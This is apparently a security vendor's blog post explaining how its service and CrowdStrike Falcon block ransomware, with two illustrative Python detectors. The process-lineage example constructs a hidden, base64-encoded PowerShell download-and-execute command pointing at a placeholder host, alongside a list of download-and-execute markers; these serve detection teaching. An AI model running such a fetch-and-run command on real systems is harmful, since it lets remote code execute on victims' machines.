With the May 2021 attack on Colonial Pipeline netting the DarkSide group $5 million in ransom, and a global rise in ransomware generally, many companies believe it is not a matter of if but when they will be attacked. Some are budgeting for ransom payments (despite warnings from the FBI), while others still believe that current technology or processes will prevent these attacks, or enable recovery from them, within minutes or hours. Meanwhile, statistics show an average recovery time of 3 to 14 days. Couple that with the fear among IT teams and security providers that they are not equipped to deal with an adversary as sophisticated as DarkSide, and many feel powerless to stop the menace of ransomware.
Much of our content educates and equips small to midsize enterprises (which often lack the resources to combat these threats) with proactive measures across the full lifecycle of an attack, including how Managed Detection and Response (MDR) can help. One area we have not been specific about, though, is what happens in the final, critical stage of a ransomware attack: the encryption and exfiltration of data carried out by the ransomware itself.
In this blog post, I break down how we stop ransomware on your operating systems with our agent. I cover four specific tactics that disrupt ransomware, separate from the ongoing hygiene and hardening regimes we offer our customers. Finally, whether it belongs to a security provider or is built internally, having an efficient Security Operations Center (SOC) behind these techniques is critical to deterring attackers. For more on a truly efficient SOC, check out my colleague's blog here. And for how to stop the attacker beyond ransomware on the endpoint, check out our white papers: The Rise of Ransomware as a Service, or Testing and Validating the Maturity of Security Programs.
What do we use to stop Ransomware?
ActZero uses multiple tools, on the endpoint and off it. We forward CrowdStrike's NGAV and EDR telemetry to our cloud, which finds anomalies using machine learning (ML) models. Native to the EDR are a number of detections that, while not specific to ransomware, do a great job of preventing malicious code (ransomware included) from launching on your endpoint in the first place. Notable ones are: drive-by download protection, living-off-the-land (LOTL) protection via Suspicious Process Blocking, Suspicious Script and Command Blocking, Suspicious Registry Operation Blocking, and Code Injection Blocking.
So, let's tackle the multiple ways these tools find and stop ransomware, with their different detection techniques and responses. First, CrowdStrike Falcon (which every client using the ActZero service has natively installed) provides automated ransomware prevention using several detection techniques that work independently, giving redundancy and a multifaceted approach to the problem. I explore each of them below in the context of the known unknowns of ransomware.
Ransomware, like other polymorphic malware, changes in predictable ways to bypass detection. For example, virtually all ransomware variants will change file properties, or the scripting language used to stage the attack, to bypass traditional antivirus (AV). The sections below show how On-Sensor ML, Cloud-Based ML, Suspicious Process Blocking and Indicators of Attack (IoA) work together to catch these changes and keep AV effective:
On-sensor Machine Learning
When systems are not connected to the internet, Falcon can still protect against ransomware variants and other threats via the On-Sensor Machine Learning engine. It uses pattern detection that can identify ransomware even when the file type is changed, or when the attack is completely fileless and delivered via processes or suspicious scripts (e.g., PowerShell). This tactic also catches zero-day variants whose properties have been changed to bypass signature detection. Check out our demonstration here. Because the verdict is reached locally, there is no round trip to and from the cloud for analysis, so you can block ransomware even if it arrived on a USB drive on an endpoint without an internet connection.
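As an added illustration of why renaming or re-typing a file does not hide it (example code written for this post, not the Falcon sensor's ML, and deliberately a static heuristic rather than a trained model), the Python below classifies a sample by its leading bytes and its entropy instead of its extension. The PE sample is constructed inside the block from a bare header and a uniform byte pattern; it is not real malware, and the file names are made up.

```python
import math
from collections import Counter

EXECUTABLE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".cpl", ".ocx", ".so"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: plain text sits around 4-5, packed or encrypted data near 8."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def container_type(data: bytes) -> str:
    """Identify the real container from its leading bytes, ignoring the file name."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        # The DOS header stores the file offset of the "PE\0\0" signature at 0x3C.
        pe_off = int.from_bytes(data[0x3C:0x40], "little")
        if data[pe_off:pe_off + 4] == b"PE\x00\x00":
            return "pe"
    if data[:4] == b"\x7fELF":
        return "elf"
    if data[:8] == b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1":
        return "ole"   # legacy Office container, may carry VBA
    if data[:2] == b"PK":
        return "zip"   # also .docx/.xlsx/.jar
    if all(b in b"\r\n\t" or 32 <= b < 127 for b in data[:512]):
        return "text"
    return "unknown"


def triage(filename: str, data: bytes, entropy_floor: float = 7.0) -> list[str]:
    """Return the reasons a sample looks suspicious; an empty list means nothing fired."""
    reasons = []
    base = filename.rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
    ext = "." + base.rsplit(".", 1)[-1] if "." in base else ""
    kind = container_type(data)
    if kind in ("pe", "elf"):
        if ext not in EXECUTABLE_EXTENSIONS:
            reasons.append(f"{kind} executable disguised with name {base!r}")
        if shannon_entropy(data) >= entropy_floor:
            reasons.append("high-entropy executable (packed or encrypted payload)")
    return reasons


def build_sample_pe(body: bytes) -> bytes:
    """Constructed stand-in for a PE file: DOS stub pointing at a PE signature, then a body."""
    header = bytearray(0x40)
    header[0:2] = b"MZ"
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return bytes(header) + b"PE\x00\x00" + body


if __name__ == "__main__":
    # A uniform byte pattern stands in for an encrypted payload (8.0 bits/byte).
    packed = build_sample_pe(bytes(range(256)) * 16)
    print(triage("Invoice_2021.txt", packed))           # two reasons fire
    print(triage("notes.txt", b"Hello, world\n" * 50))  # []
```

The point of the example is the order of operations: the verdict is computed from bytes the attacker cannot change without breaking the executable, so a `.txt` or `.jpg` suffix buys nothing. A real sensor adds many more features on top of this and learns the weights rather than hard-coding a 7.0 threshold, but the extension-independence is the same.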
Cloud-Based Machine Learning
The broadest and easiest way to prevent ransomware such as DarkSide, GandCrab and WannaCry (some of the most prolific malware campaigns in North America) is machine learning. Cloud-based algorithms predict malicious outcomes from EDR data much as the on-sensor (local) algorithms do, but with far more compute available to run detections and models. The cloud models operate together with those on the machine, but require data to be forwarded before they can determine whether the file (or the activity) is malicious and push a command or policy update down to block it. Because this round trip runs across CrowdStrike's global data set, it also surfaces new threats, and the speed and automation of the process typically returns an action in under a minute; impressive when combined with the immediate detection and response from the local sensor.
Suspicious Process Blocking
Suspicious Process Blocking identifies processes associated with ransomware variants as suspicious and blocks them: a script host such as PowerShell, or VBScript running inside Word (in which case Word itself is the process). This is sometimes referred to as Exploit Blocking, which examines the techniques typically used in an exploit to take control of the operating system by abusing its flaws.
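The lineage idea above, as an added example (my illustration, not CrowdStrike's rule set): the Python below replays a constructed set of process-creation records, flags a script host whose parent is an Office application, and decodes a PowerShell `-EncodedCommand` argument so the download-and-execute stage hidden inside it can be matched. The process records, pids, paths and the `example.invalid` URL are made up for the demonstration.

```python
import base64
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # lower-case image name, e.g. "winword.exe"
    cmdline: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}
# Substrings that usually mean "fetch and run more code"; matched after decoding.
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "invoke-expression", "frombase64string", "certutil -urlcache")


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or "" if absent.

    powershell.exe accepts any unambiguous prefix of the switch (-e, -enc, -EncodedCommand)
    and the value is base64 of UTF-16LE text, so a plain substring search over the raw
    command line would never see the DownloadString call carried inside it.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        if low.startswith("-e") and "-encodedcommand".startswith(low):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def evaluate(events: list[ProcessEvent]) -> list[tuple[int, str]]:
    """Apply lineage and command-line rules to a batch of process-creation records."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and parent.image in OFFICE_APPS and e.image in SCRIPT_HOSTS:
            findings.append((e.pid, f"{parent.image} spawned {e.image}"))
        decoded = ""
        if e.image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(e.cmdline)
        if decoded:
            findings.append((e.pid, "encoded PowerShell command decodes to: " + decoded.strip()))
        text = (e.cmdline + " " + decoded).lower()
        if any(m in text for m in DOWNLOAD_MARKERS) or "iex" in text.split():
            findings.append((e.pid, "download-and-execute marker in command line"))
    return findings


def build_sample_events() -> list[ProcessEvent]:
    """Constructed records: Word opening a macro document, then launching hidden PowerShell."""
    stage2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    enc = base64.b64encode(stage2.encode("utf-16-le")).decode()
    return [
        ProcessEvent(400, 1, "explorer.exe", "explorer.exe"),
        ProcessEvent(512, 400, "winword.exe", r'"winword.exe" C:\Users\a\Downloads\Invoice.docm'),
        ProcessEvent(600, 512, "powershell.exe", f"powershell.exe -nop -w hidden -enc {enc}"),
        # An administrator's script launched from the desktop: same image, benign lineage.
        ProcessEvent(700, 400, "powershell.exe", r"powershell.exe -File C:\scripts\inventory.ps1"),
    ]


if __name__ == "__main__":
    for pid, reason in evaluate(build_sample_events()):
        print(pid, reason)
```

Only pid 600 produces findings: the same `powershell.exe` image launched by Explorer with a plain `-File` argument is left alone, which is the point of judging the process by its parent and arguments rather than by its name.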
Finally, most ransomware has predictable behavior. We use this to our advantage and provide protection in addition to machine learning. Sometimes referred to as Indicators of Attack (IoAs), these detections focus on the actions being taken and prevent them. For example, many ransomware programs steal credentials, delete your local backups, change a high number of files substantially in a short time, and then quickly write a note demanding bitcoin. It does not matter whether the source is a process, a script or another automated program: the behavior, or action taken, presents the same. This type of behavior-based policy is also how ActZero's ML complements CrowdStrike, providing broader detections beyond those that come off the shelf with Falcon.
I hope you have seen how these four tactics help block ransomware, and why machine learning is needed to power them. To see these detections in action, you can request a demo of the service. Or, if you would like to understand more about the strategies behind our machine-learning algorithms, we detail them on our website, here. Finally, if you want to learn more about the plight of ransomware itself, check out our white paper The Rise of Ransomware-as-a-Service.